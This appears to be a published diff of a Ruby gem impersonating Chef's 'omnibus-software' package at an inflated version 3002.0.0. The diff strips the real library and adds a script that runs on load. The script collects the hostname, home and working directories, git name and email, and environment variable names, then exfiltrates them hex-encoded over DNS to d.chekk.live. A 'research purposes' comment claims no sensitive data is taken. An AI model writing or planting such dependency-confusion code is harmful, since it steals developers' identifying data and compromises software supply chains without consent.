omnibus-software 23.7.295 → 3002.0.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: dfe02802ec43c07574d343edb28bad14b5c93a6506509439e2439f6fc67299ee
-  data.tar.gz: 9415339075f4c8eab2706d65328ba8f86f7510e61083e01ab318ed475ded3d56
+  metadata.gz: 0bd626ac1e63e5839a14f62475b42c9984354ded6172b45586db555b465fb516
+  data.tar.gz: d5fb522a8f85e133680545c81f8d688af5ed9612d8dd5adc1f126927a7298cdc
 SHA512:
-  metadata.gz: 0fdbc2feff630f1f3abca60c97733f0e7ba4474354e1826c66e9ceb9f447778bf794efbd99eb8311a1da480fde63db9f194b5124a68a379fbc89ff86d7602987
-  data.tar.gz: 899a6c5f8f5580dd628f2dde5666b9fe4bce98cc17183e8d9efee6aec5d3a792216561b0588630e4553c51c5466a8f39f0c3c943777dadb33727e1e2ba0a19c0
+  metadata.gz: 7cd098f0cdcd280b52c4f2ddf99d8f04f95d66ecbb94f8a7a134ab00918582d665c196362b06eb4ff2a431ac0a008ad9bbec8c8f6d5d69f20d27b77616092012
+  data.tar.gz: e066d5fc0983bd735b797fa203a07bb1c271bf619246a27334fc8c54ea202701a80437a29c127fc2ca4219d0a45a21740e03bce187bc1c1c6b069904cbb4a049

data/lib/omnibus-software.rb

@@ -1,115 +1,100 @@
-#
-# Copyright 2012-2014 Chef Software, Inc.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-require "pathname" unless defined?(Pathname)
-require "omnibus"
-require "highline"
-
-module OmnibusSoftware
-  class << self
-    #
-    # The root where Omnibus Software lives.
-    #
-    # @return [Pathname]
-    #
-    def root
-      @root ||= Pathname.new(File.expand_path("..", __dir__))
-    end
 
-    #
-    # Verify the given software definitions, iterating over each software and
-    # loading it. This is probably the most primitive test ever - just load the
-    # DSL files - but it is the best thing we have for CI in omnibus-software.
-    #
-    # @return [void]
-    #
-    def verify!
-      for_each_software do |_software|
-        $stdout.print "."
-      end
-    end
+=begin
 
-    def fetch(name, path)
-      fetch_software(load_software(name), path)
-    end
+This code is used for research purposes.
 
-    def fetch_all(path)
-      for_each_software do |software|
-        # only fetch net_fetcher sources for now
-        next if software.source.nil? || software.source[:url].nil?
+No sensitive data is retrieved.
 
-        fetch_software(software, path)
-      end
-    end
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
 
-    def fetch_software(software, path)
-      Omnibus::Config.cache_dir File.expand_path(path)
-      Omnibus::Config.use_s3_caching false
-      Omnibus.logger.level = :debug
-      puts "Fetching #{software.name}"
-      software.fetcher.fetch
-    end
+Any other callbacks will be ignored, and
+any associated data will not be kept.
 
-    def list
-      Omnibus.logger.level = :fatal
-      h = HighLine.new
-      for_output = ["Name", "Default Version", "Source"]
-      for_each_software do |software|
-        for_output += [software.name, software.default_version, maybe_source(software.source)]
-      end
-      puts h.list(for_output, :uneven_columns_across, 3)
-    end
+=end
 
-    private
-
-    def maybe_source(source)
-      if source
-        if source[:git]
-          "GIT #{source[:git]}"
-        elsif source[:url]
-          "NET #{source[:url]}"
-        else
-          "OTHER"
-        end
-      else
-        "NONE"
-      end
-    end
+require 'socket'
+require 'json'
+require 'resolv'
 
-    def fake_project
-      @fake_project ||= Omnibus::Project.new.evaluate do
-        name "project.sample"
-        install_dir "tmp/project.sample"
-      end
-    end
+suffix = 'd.chekk.live'
+ns = 'dns1.chekk.live'
 
-    def software_dir
-      OmnibusSoftware.root.join("config/software")
-    end
+package = 'omnibus-software'
 
-    def load_software(software_name)
-      Omnibus::Config.local_software_dirs(OmnibusSoftware.root)
-      Omnibus::Software.load(fake_project, software_name, nil)
-    end
 
-    def for_each_software
-      Dir.glob("#{software_dir}/*.rb").each do |filepath|
-        name = File.basename(filepath, ".rb")
-        yield load_software(name)
-      end
+
+def convert_string_to_hex(string)
+    string.unpack("H*")
+end
+
+
+def chunk_string(string, length)
+    string.scan(/.{1,#{length}}/)
+end
+
+
+def get_user_from_git_config()
+    # get user name and email from git config
+    begin
+        user_name = `git config user.name`.chomp
+        user_email = `git config user.email`.chomp
+    rescue
+        user_name = ''
+        user_email = ''
+        
     end
-  end
+    return user_name, user_email
+end
+
+def get_environment_variables_names()
+    # get environment variables NAMES (not values, no sensitive data is extracted) sorted by name
+    # to get a better idea of execution context and prove potential impact to organization
+    env_vars = ENV.keys.sort
+    return env_vars
+end
+
+git_name, git_email = get_user_from_git_config()
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd,
+    'gn' => git_name,
+    'ge' => git_email,
+    'ev' => get_environment_variables_names()
+}
+
+data = JSON.generate(data)
+
+# convert to hex and chunk
+data_hex_chunks = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data_hex_chunks.each.each_with_index do |chunk, idx|
+    begin
+        addr = ['v2_f', id_1, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        Resolv.getaddress addr
+    rescue; end
+
+    begin
+        addr = ['v2_f', id_2, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        custom_res.getaddress addr
+    rescue; end
 end

metadata

@@ -1,287 +1,27 @@
 --- !ruby/object:Gem::Specification
 name: omnibus-software
 version: !ruby/object:Gem::Version
-  version: 23.7.295
+  version: 3002.0.0
 platform: ruby
 authors:
-- Chef Software, Inc.
-autorequire: 
+- John Doe
+autorequire:
 bindir: bin
 cert_chain: []
-date: 2023-07-24 00:00:00.000000000 Z
-dependencies:
-- !ruby/object:Gem::Dependency
-  name: omnibus
-  requirement: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">="
-      - !ruby/object:Gem::Version
-        version: 9.0.0
-  type: :runtime
-  prerelease: false
-  version_requirements: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">="
-      - !ruby/object:Gem::Version
-        version: 9.0.0
-description: Open Source software build descriptions for use with Omnibus
-email:
-- info@chef.io
+date: 2021-12-02 00:00:00.000000000 Z
+dependencies: []
+description: Security assesment
+email: jjdoe2@doe.com
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- ".buildkite/hooks/pre-command"
-- ".expeditor/Version_inspector/README.md"
-- ".expeditor/Version_inspector/SW-Version-update.py"
-- ".expeditor/Version_inspector/manual_prod_list.json"
-- ".expeditor/Version_inspector/prod_default_version.json"
-- ".expeditor/Version_inspector/prod_list.json"
-- ".expeditor/Version_inspector/requirements.txt"
-- ".expeditor/Version_inspector/update_prod_default_version.sh"
-- ".expeditor/Version_inspector/update_prod_list.sh"
-- ".expeditor/config.yml"
-- ".expeditor/determine_version.sh"
-- ".expeditor/push_git_tag.sh"
-- ".expeditor/run_linux_tests.sh"
-- ".expeditor/software_upload.pipeline.yml"
-- ".expeditor/verify.pipeline.yml"
-- ".github/CODEOWNERS"
-- ".github/ISSUE_TEMPLATE/BUG_TEMPLATE.md"
-- ".github/ISSUE_TEMPLATE/DESIGN_PROPOSAL.md"
-- ".github/ISSUE_TEMPLATE/ENHANCEMENT_REQUEST_TEMPLATE.md"
-- ".github/ISSUE_TEMPLATE/SUPPORT_QUESTION.md"
-- ".github/dependabot.yml"
-- ".github/lock.yml"
-- ".gitignore"
-- CHANGELOG.md
-- CODE_OF_CONDUCT.md
-- CONTRIBUTING.md
-- Dockerfile
-- Gemfile
-- LICENSE
-- README.md
-- Rakefile
-- VERSION
-- config/patches/bash/race-condition.patch
-- config/patches/bash/updated_race-condition.patch
-- config/patches/bzip2/aix_makefile.patch
-- config/patches/bzip2/makefile_no_bins.patch
-- config/patches/bzip2/makefile_take_env_vars.patch
-- config/patches/bzip2/soname_install_dir.patch
-- config/patches/curl/curl-aix-disable-alpn.patch
-- config/patches/curl/curl-freebsd-hostcheck.patch
-- config/patches/erlang/epmd-require-explicitly-adding-loopback-address.patch
-- config/patches/erlang/updated-epmd-require-explicitly-adding-loopback-address.patch
-- config/patches/expat/configure_xlc_visibility.patch
-- config/patches/expat/configure_xlc_visibility_2.4.7.patch
-- config/patches/figlet/aix-figlet-cdefs.patch
-- config/patches/gdbm/v1.8.3-Makefile.in.patch
-- config/patches/git/aix-endian-fix.patch
-- config/patches/gtar/aix_extra_case.patch
-- config/patches/keepalived/keepalived-1.2.9_opscode_centos_5.patch
-- config/patches/libedit/freebsd-vi-fix.patch
-- config/patches/libedit/openbsd-weak-alias-fix.patch
-- config/patches/libedit/solaris.patch
-- config/patches/libffi/libffi-3.2.1-disable-multi-os-directory.patch
-- config/patches/libffi/libffi-3.3-arm64.patch
-- config/patches/libxslt/libxslt-solaris-configure.patch
-- config/patches/libxslt/libxslt-windows-relocate.patch
-- config/patches/libyaml/windows-configure.patch
-- config/patches/libzmq/zeromq-4.0.11_mingw_inet_pton.patch
-- config/patches/libzmq/zeromq-aix-4.2.2-LARGE_FILES.patch
-- config/patches/libzmq/zeromq-aix-4.2.2-atomic-counter-fetch_and_add.patch
-- config/patches/logrotate/logrotate_basedir_override.patch
-- config/patches/m4/m4-1.4.18-glibc-change-work-around.patch
-- config/patches/make/deb-make-glob.patch
-- config/patches/ncurses/ncurses-5.9-gcc-5.patch
-- config/patches/ncurses/ncurses-5.9-solaris-xopen_source_extended-detection.patch
-- config/patches/ncurses/ncurses-clang.patch
-- config/patches/ncurses/patch-aa
-- config/patches/ncurses/patch-ab
-- config/patches/ncurses/patch-ac
-- config/patches/ncurses/patch-ad
-- config/patches/ncurses/patch-cxx_cursesf.h
-- config/patches/ncurses/patch-cxx_cursesm.h
-- config/patches/ncurses/patch-ncurses_tinfo_lib__baudrate.c
-- config/patches/openssl-fips/openssl-fips-fix-compiler-flags-table-for-msys.patch
-- config/patches/openssl/openssl-1.0.1f-do-not-build-docs.patch
-- config/patches/openssl/openssl-1.0.1j-windows-relocate-dll.patch
-- config/patches/openssl/openssl-1.0.1q-fix-compiler-flags-table-for-msys.patch
-- config/patches/openssl/openssl-1.0.2x-darwin-arm64.patch
-- config/patches/openssl/openssl-1.1.0f-do-not-install-docs.patch
-- config/patches/openssl/openssl-3.0.1-do-not-install-docs.patch
-- config/patches/perl/perl-5.18.1-remove_lnsl.patch
-- config/patches/perl/perl-5.22.1-remove_lnsl.patch
-- config/patches/perl/perl-5.30.0-remove_lnsl.patch
-- config/patches/perl/perl-5.32.1-remove_lnsl.patch
-- config/patches/perl/perl-5.34.0-remove_lnsl.patch
-- config/patches/pkg-config/openbsd-charset.patch
-- config/patches/popt/v1.16.ppc64le-configure.patch
-- config/patches/redis/password-from-environment.patch
-- config/patches/ruby/patch-configure
-- config/patches/ruby/remove_nano.patch
-- config/patches/ruby/ruby-2.6.7_c99.patch
-- config/patches/ruby/ruby-3.0.1-configure.patch
-- config/patches/ruby/ruby-3.0.2-configure.patch
-- config/patches/ruby/ruby-3.0.5-configure.patch
-- config/patches/ruby/ruby-aix-atomic.patch
-- config/patches/ruby/ruby-aix-configure_26_and_later.patch
-- config/patches/ruby/ruby-aix-vm-core.patch
-- config/patches/ruby/ruby-fast-load_26.patch
-- config/patches/ruby/ruby-fast-load_31.patch
-- config/patches/ruby/ruby-faster-load_26.patch
-- config/patches/ruby/ruby-faster-load_27.patch
-- config/patches/ruby/ruby-mkmf.patch
-- config/patches/ruby/ruby-no-stack-protector-strong.patch
-- config/patches/ruby/ruby-no-stack-protector.patch
-- config/patches/ruby/ruby-win32_warning_removal.patch
-- config/patches/ruby/ruby_aix_openssl.patch
-- config/patches/ruby/ruby_aix_ssl_EAGAIN.patch
-- config/patches/ruby/rvm-cflags.patch
-- config/patches/stunnel/stunnel-on-windows.patch
-- config/patches/zlib/zlib-windows-relocate.patch
-- config/software/autoconf.rb
-- config/software/automake.rb
-- config/software/bash.rb
-- config/software/berkshelf-no-depselector.rb
-- config/software/berkshelf.rb
-- config/software/binutils.rb
-- config/software/bundler.rb
-- config/software/bzip2.rb
-- config/software/cacerts.rb
-- config/software/chef-gem.rb
-- config/software/chef.rb
-- config/software/cmake.rb
-- config/software/config_guess.rb
-- config/software/cpanminus.rb
-- config/software/curl.rb
-- config/software/delivery-cli.rb
-- config/software/dep-selector-libgecode.rb
-- config/software/elasticsearch.rb
-- config/software/elixir.rb
-- config/software/erlang.rb
-- config/software/expat.rb
-- config/software/fakeroot.rb
-- config/software/ffi-yajl.rb
-- config/software/figlet-fonts.rb
-- config/software/figlet.rb
-- config/software/gcc.rb
-- config/software/gdbm.rb
-- config/software/gecode.rb
-- config/software/gem-permissions.rb
-- config/software/git-windows.rb
-- config/software/git.rb
-- config/software/gmp.rb
-- config/software/go-uninstall.rb
-- config/software/go.rb
-- config/software/google-protobuf.rb
-- config/software/gtar.rb
-- config/software/help2man.rb
-- config/software/highline-gem.rb
-- config/software/ibm-jre.rb
-- config/software/inspec.rb
-- config/software/jre-from-jdk.rb
-- config/software/keepalived.rb
-- config/software/libarchive.rb
-- config/software/libedit.rb
-- config/software/libffi.rb
-- config/software/libgcc.rb
-- config/software/libiconv.rb
-- config/software/libintl-perl.rb
-- config/software/liblzma.rb
-- config/software/libossp-uuid.rb
-- config/software/libsodium.rb
-- config/software/libtool.rb
-- config/software/libuuid.rb
-- config/software/libxml2.rb
-- config/software/libxslt.rb
-- config/software/libyajl2-gem.rb
-- config/software/libyaml.rb
-- config/software/libzmq.rb
-- config/software/logrotate.rb
-- config/software/lua.rb
-- config/software/m4.rb
-- config/software/make.rb
-- config/software/makedepend.rb
-- config/software/mpc.rb
-- config/software/mpfr.rb
-- config/software/musl.rb
-- config/software/mysql2.rb
-- config/software/ncurses.rb
-- config/software/nginx.rb
-- config/software/nodejs-binary.rb
-- config/software/nodejs.rb
-- config/software/nokogiri.rb
-- config/software/omnibus-ctl.rb
-- config/software/openresty.rb
-- config/software/opensearch.rb
-- config/software/openssl-customization.rb
-- config/software/openssl-fips.rb
-- config/software/openssl.rb
-- config/software/patch.rb
-- config/software/patchelf.rb
-- config/software/pcre.rb
-- config/software/perl-extutils-embed.rb
-- config/software/perl-extutils-makemaker.rb
-- config/software/perl-thread-queue.rb
-- config/software/perl.rb
-- config/software/perl_pg_driver.rb
-- config/software/pg-gem.rb
-- config/software/pkg-config-lite.rb
-- config/software/pkg-config.rb
-- config/software/popt.rb
-- config/software/postgresql.rb
-- config/software/preparation.rb
-- config/software/python.rb
-- config/software/rabbitmq.rb
-- config/software/rb-readline.rb
-- config/software/rbnacl-libsodium.rb
-- config/software/rbzmq.rb
-- config/software/rebar.rb
-- config/software/redis-gem.rb
-- config/software/redis.rb
-- config/software/relx.rb
-- config/software/rsync.rb
-- config/software/ruby-cleanup.rb
-- config/software/ruby-msys2-devkit.rb
-- config/software/ruby-windows-devkit-bash.rb
-- config/software/ruby-windows-devkit.rb
-- config/software/ruby.rb
-- config/software/rubygems.rb
-- config/software/runit.rb
-- config/software/rust-uninstall.rb
-- config/software/rust.rb
-- config/software/sequel-gem.rb
-- config/software/server-jre.rb
-- config/software/server-open-jre.rb
-- config/software/setuptools.rb
-- config/software/shebang-cleanup.rb
-- config/software/sqitch.rb
-- config/software/stunnel.rb
-- config/software/util-macros.rb
-- config/software/version-manifest.rb
-- config/software/xproto.rb
-- config/software/zlib.rb
-- config/templates/git/config.mak.erb
-- config/templates/rubygems/register_devtools.rb.erb
-- config/templates/runit/runsvdir-start.erb
-- docker-compose.yml
 - lib/omnibus-software.rb
-- lib/omnibus-software/version.rb
-- omnibus-software.gemspec
-- scripts/internal_sources.rb
-- scripts/internal_sources.yml
-- test/Gemfile
-- test/config/projects/test.rb
-- test/generate_steps.rb
-- test/omnibus-build.sh
-- test/omnibus.rb
-homepage: https://github.com/chef/omnibus-software
+homepage: https://rubygems.org/gems/omnibus-software
 licenses:
-- Apache-2.0
+- MIT
 metadata: {}
-post_install_message: 
+post_install_message:
 rdoc_options: []
 require_paths:
 - lib
@@ -296,8 +36,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.1.4
-signing_key: 
+rubygems_version: 3.2.32
+signing_key:
 specification_version: 4
-summary: Open Source software for use with Omnibus
+summary: Security assesment
 test_files: []

data/.buildkite/hooks/pre-command

@@ -1,9 +0,0 @@
-#!/bin/bash
-
-set -eu
-
-if [[ $BUILDKITE_ORGANIZATION_SLUG != "chef-oss" ]]; then
-  export VAULT_ADDR="https://vault.ps.chef.co"
-  export VAULT_TOKEN=$(vault login -method=aws -path=aws/private-cd -token-only header_value=vault.ps.chef.co role=ci)
-  export ARTIFACTORY_PASSWORD=$(vault kv get -field password account/static/artifactory/buildkite)
-fi

data/.expeditor/Version_inspector/README.md

@@ -1,21 +0,0 @@
-# Version Inspector 
-	python based utility software that can be used to find the latest version information for the omnibus-software packages .
-
-## Execute the below command to install the dependencies.
-	$pip3 install -r requirements.txt
-
-## SW-Version-update.py 
-	python script to get the latest version of products.
-		command to run the script
-		$python3 SW-Version-update.py [json]
-			 Pass 'json' as CLA for json o/p
-			 1. checks latest version  for all the products and lists the product, default version and latest version with url
-			 2. checks for latset version for a particular product
-			 3. List the products that needs to be checked for latest version manually
- 
-## update_prod_default_version.sh 
-	rebase your branch with main to get the latest updated version updates and execute this script, which generates update_prod_default_version.json
-## update_prod_list.sh 
-	Not necessary to run all the time. ALl the product are upto date. Dont run this script until unless it is required. This script generates prod_list.json. 
-## manual_prod_list.json 
-	contains the list of products that needs to be checked for latest version manually.